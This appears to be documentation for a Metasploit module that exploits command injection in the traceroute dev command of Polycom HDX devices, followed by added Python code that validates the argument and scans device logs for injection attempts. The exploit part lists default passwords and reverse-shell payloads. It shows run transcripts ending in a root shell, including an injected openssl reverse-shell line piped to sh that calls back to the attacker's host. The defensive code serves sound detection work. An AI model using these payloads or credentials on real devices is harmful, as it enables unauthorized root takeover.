Within Polycom HDX series devices, there is a command execution vulnerability in one of the dev commands (`devcmds`), `lan traceroute`. Substituting `$()` or a similar operator into its argument, much like in [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb), could allow an attacker to obtain a command shell. Spaces must be replaced with `${IFS}` (the shell's Internal Field Separator).

## Vulnerable Application

Tested on the latest and greatest version of the firmware; the vendor has not patched since the issue was reported. [Found here](http://downloads.polycom.com/video/hdx/polycom-hdx-release-3.1.10-51067.pup)

## Options

### PASSWORD

Although the majority of devices come without a password, when one is required you can set this option to one of the defaults `456`, `admin`, or `POLYCOM`, or to the device's own password.

## Payloads

Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet`. Alternatively, `cmd/unix/reverse_openssl` can be used, or your own choice of arbitrary command with `cmd/unix/generic`.

```
Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
```

## Verification Steps

A successful run of the exploit will look like this:

```
msf exploit(polycom) > set RHOST 192.168.0.17
RHOST => 192.168.0.17
msf exploit(polycom) > set LHOSt ens3
LHOSt => ens3
msf exploit(polycom) > set LPORT 3511
LPORT => 3511
msf exploit(polycom) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)

msf exploit(polycom) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(polycom) > set VERBOSE false
VERBOSE => false
msf exploit(polycom) > run

[*] Started reverse TCP double handler on 192.168.0.11:3511
[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!
[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:34874...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vGopPRp0jBxt4J2D;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "vGopPRp0jBxt4J2D\n"
[*] Matching...
[*] A is input...
[*] Command shell session 10 opened (192.168.0.11:3511 -> 192.168.0.17:37687) at 2017-11-15 10:29:58 -0500
[*] 192.168.0.17:23 - Shutting down payload stager listener...

id
uid=0(root) gid=0(root)
whoami
root
```

## Debugging

Setting `VERBOSE` to true should yield output like the following:

```
msf exploit(polycom) > set VERBOSE true
VERBOSE => true
msf exploit(polycom) > run

[*] Started reverse TCP double handler on 192.168.0.11:3511
[*] 192.168.0.17:23 - Received : !
Polycom Command Shell
XCOM host: localhost port: 4121
TTY name: /dev/pts/6
Session type: telnet
2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: freeing conn [conn: 0x1266f300] [sock: 104] [thread: 0x12559e68]
2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: SessionHandler: freeing session 4340
2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession(sess: 4340)
2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession current open sessions count= 9
2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:main_server_thread: new connection [conn: 0x1266f300] [sock: 104]
2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: new conn [conn: 0x1266f300] [sock: 104] [thread: 0x1255a010] [TID: 3380]
2017-11-15 15:33:12 DEBUG avc: pc[0]: uimsg: [R: telnet /tmp/apiasynclisteners/psh6 /dev/pts/6]
2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession(type: telnet sess: 4342)
2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession current open sessions count= 10
2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: register_api_session pSession=0x12669918
2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: about to call sendJavaMessageEx
2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: session 4342 registered
[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!
[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:37450...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo WD3QloY3fys6n7dK;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] 192.168.0.17:23 - devcmds
Entering sticky internal commands *ONLY* mode...
lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`
2017-11-15 15:33:13 DEBUG avc: pc[0]: uimsg: [D: lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`]
2017-11-15 15:33:13 DEBUG avc: pc[0]: os: task:DETR pid:3369 thread 4e5ff4c0 11443 12660c68
2017-11-15 15:33:14 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, hostnameORIP: `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` hop_count: 0
[*] Reading from socket B
[*] B: "WD3QloY3fys6n7dK\n"
[*] Matching...
[*] A is input...
[*] Command shell session 11 opened (192.168.0.11:3511 -> 192.168.0.17:38624) at 2017-11-15 10:34:23 -0500
[*] 192.168.0.17:23 - Shutting down payload stager listener...

id
uid=0(root) gid=0(root)
whoami
root
```
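The debug output above is useful on the defensive side as well: the device logs the raw `hostnameORIP` argument of every `lan traceroute` call, so the injected string (backticks, `${IFS}`, a pipe) is visible verbatim. The following added example, which is neither the Metasploit module's code nor any Polycom code, shows two things: the allow-list check a `lan traceroute` handler should apply to its argument (a hypothetical `is_valid_traceroute_target`, accepting only a bare IPv4 address or DNS hostname), and a small scanner that runs that same check over `DevMgrEther: Trace Route Command Entry` log lines to flag attempts. The sample log is constructed from the page's debug output plus one benign entry.

```python
import re

# Hypothetical allow-list grammar for the traceroute argument: a dotted IPv4
# address or an RFC 1123 hostname. Anything outside this is rejected outright,
# so shell metacharacters never reach the command that is eventually spawned.
_IPV4 = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"
)
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def is_valid_traceroute_target(arg: str) -> bool:
    """Allow-list check: True only for a bare IPv4 address or DNS hostname."""
    return bool(_IPV4.match(arg) or _HOSTNAME.match(arg))


# Tokens that have no business inside a hostname: command substitution,
# variable expansion (including the ${IFS} space substitute), pipes, etc.
_SHELL_META = re.compile(r"\$\{IFS\}|[`$|;&<>(){}]")


def injection_indicators(arg: str) -> list:
    """Return the distinct shell metacharacters / IFS tokens found in arg."""
    return sorted(set(_SHELL_META.findall(arg)))


# Shape of the device's own log entry, as seen in the verbose output above.
_LOG_ENTRY = re.compile(
    r"Trace Route Command Entry, hostnameORIP: (?P<arg>.*?) hop_count: \d+\s*$"
)


def scan_device_log(lines) -> list:
    """Return (line_no, argument, indicators) for every traceroute entry whose
    argument fails the allow-list check."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = _LOG_ENTRY.search(line)
        if not m:
            continue
        arg = m.group("arg")
        if not is_valid_traceroute_target(arg):
            hits.append((line_no, arg, injection_indicators(arg)))
    return hits


# Constructed sample: one benign traceroute, one unrelated line, and the
# injected entry copied from the page's debug output.
SAMPLE_LOG = [
    "2017-11-15 15:30:01 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, "
    "hostnameORIP: 8.8.8.8 hop_count: 0",
    "2017-11-15 15:33:13 DEBUG avc: pc[0]: os: task:DETR pid:3369 thread 4e5ff4c0 11443 12660c68",
    "2017-11-15 15:33:14 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, "
    "hostnameORIP: `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11"
    "${IFS}-port${IFS}37873|sh` hop_count: 0",
]

if __name__ == "__main__":
    for line_no, arg, indicators in scan_device_log(SAMPLE_LOG):
        print(f"line {line_no}: rejected argument {arg!r}; indicators {indicators}")
```

Run against the sample, only the third line is reported, with `${IFS}`, the backtick and the pipe listed as indicators; the benign `8.8.8.8` entry passes the allow-list and is ignored. The same `_LOG_ENTRY` pattern can be pointed at a syslog export from the device to look for historical attempts.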